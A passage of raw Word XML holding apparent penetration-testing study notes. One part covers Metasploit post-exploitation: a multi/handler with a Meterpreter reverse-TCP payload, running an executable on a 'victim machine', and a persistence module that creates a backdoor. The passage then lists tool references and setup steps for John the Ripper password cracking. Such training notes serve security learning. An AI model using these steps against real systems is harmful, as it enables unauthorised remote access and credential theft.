        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C26A737" w14:textId="2E53B299" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BF76368" w14:textId="156BC654" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>set LHOST and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A440D5" w14:textId="62825823" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7C2C34" w14:textId="0CDB9206" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7DB75C" w14:textId="09232A28" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514E77F" w14:textId="70033C06" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="00CB3CDD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run Persistence Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4722B2C2" w14:textId="1DDDAD1C" w:rsidR="00CB3CDD" w:rsidRPr="0084205E" w:rsidRDefault="007A77D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use exploit/windows/local/persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C46DE57" w14:textId="21C0B250" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="007A77D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>will send payload every 10 seconds in default (time is adjustable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78857DAD" w14:textId="6C935520" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="007A77D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B359419" w14:textId="2CDE7A0C" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="007A77D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">this allows a backdoor to be created that is reachable using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and setting payload to windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DFCEAA2" w14:textId="433E3124" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="007A77D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F00BB1" w14:textId="0E785F0A" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.harmj0y.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="536B9CC6" w14:textId="0F61A375" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://adsecurity.org/?page_id=1821</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F8E2111" w14:textId="43199273" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://metasploit.help.rapid7.com/docs/about-post-exploitation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20F24992" w14:textId="2F7A8E77" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.pentest-standard.org/index.php/Post_Exploitation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="354467DD" w14:textId="66A88D51" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://offsec.red/mimikatz-cheat-sheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E1335E3" w14:textId="084B6391" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F2A7FEE" w14:textId="4EA9098B" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/gentilkiwi/mimikatz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15AEEC4B" w14:textId="7D52171D" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44ABDB31" w14:textId="281EB363" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="007A77D0" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FF228EB" w14:textId="5903C8A4" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="007A77D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38AEFC4E" w14:textId="21695F7A" w:rsidR="007A77D0" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62808DB4" w14:textId="258D3653" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hashes operate one way – dependent on P vs NP relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569DBC7" w14:textId="4BDC501C" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>crackable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> by comparing password hash outputs from a dictionary to subject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA1F15" w14:textId="50405A2C" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">dictionary attacks via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>JtR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FD02938" w14:textId="10CA3FB7" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Setting up John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB189C" w14:textId="4F5B1B7D" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Parrot, Kali, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="753A7AE0" w14:textId="1397F702" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Jumbo John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EBB49C" w14:textId="640385D7" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo apt install john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76327227" w14:textId="16FE1024" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Blackarch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BBDFE36" w14:textId="45460695" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pacman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Qe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | grep “john”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7753E1" w14:textId="7E08709C" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pacman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -S john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D50ABB" w14:textId="182D769D" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Building from Source for Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232C27A6" w14:textId="4A300F6C" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>git clone https://github.com/openwall/john -b bleeding-jumbo john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC8C2F" w14:textId="22261F8C" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cd john/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B94F7A1" w14:textId="348D9AE8" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>configure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C7DC4" w14:textId="2E7453AE" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>make -s clean &amp;&amp; make -sj4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBAFD7F" w14:textId="4EBCD43E" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cd .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27351A" w14:textId="521FCB2C" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="00B83B14" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Installing on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C24881" w14:textId="630FBB8E" w:rsidR="00B83B14" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>download and install zipped binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B2D7F" w14:textId="2756DC23" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
